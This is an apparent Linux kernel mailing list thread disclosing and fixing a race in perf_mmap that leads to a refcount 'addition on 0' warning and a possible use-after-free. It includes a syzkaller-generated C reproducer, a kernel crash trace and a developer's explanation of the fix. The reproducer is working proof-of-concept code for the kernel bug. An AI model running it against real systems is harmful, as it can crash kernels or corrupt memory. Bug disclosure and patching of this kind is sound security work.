r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
Hi Peter,
Thanks for the review. You are right, my previous explanation was
inaccurate. The actual race condition occurs between a failing
mmap() on one event and a concurrent mmap() on a second event
that shares the ring buffer (e.g., via output redirection).
Detailed scenario is as follows, for example:
1. Thread A calls mmap(event_A). It allocates the ring buffer, sets
event_A->rb, and initializes refcount to 1. It then drops mmap_mutex.
2. Thread A calls map_range(). Suppose this fails. Thread A then
proceeds to the error path and calls perf_mmap_close().
3. Thread B concurrently calls mmap(event_B), where event_B is
configured to share event_A's buffer. Thread B acquires
event_A->mmap_mutex and sees the valid event_A->rb pointer.
4. The race triggers here: If Thread A's perf_mmap_close() logic
decrements the ring buffer's refcount to 0 (releasing it) but the pointer
event_A->rb is still visible to Thread B (or was read by Thread B before
it was cleared), Thread B triggers the "refcount_t: addition on 0" warning
when it attempts to increment the refcount in perf_mmap_rb().
The fix extends the scope of mmap_mutex to cover map_range() and the
potential error handling path. This ensures that event->rb is only exposed
to other threads after it is fully successfully mapped, or it is cleaned up
atomically inside the lock if mapping fails.
I have updated the commit message accordingly.
Thanks,
Haocheng
|
{
"author": "=?UTF-8?B?5L2Z5piK6ZOW?= <yuhaocheng035@gmail.com>",
"date": "Mon, 2 Feb 2026 23:51:28 +0800",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning
The full report is as below:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
----------
The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
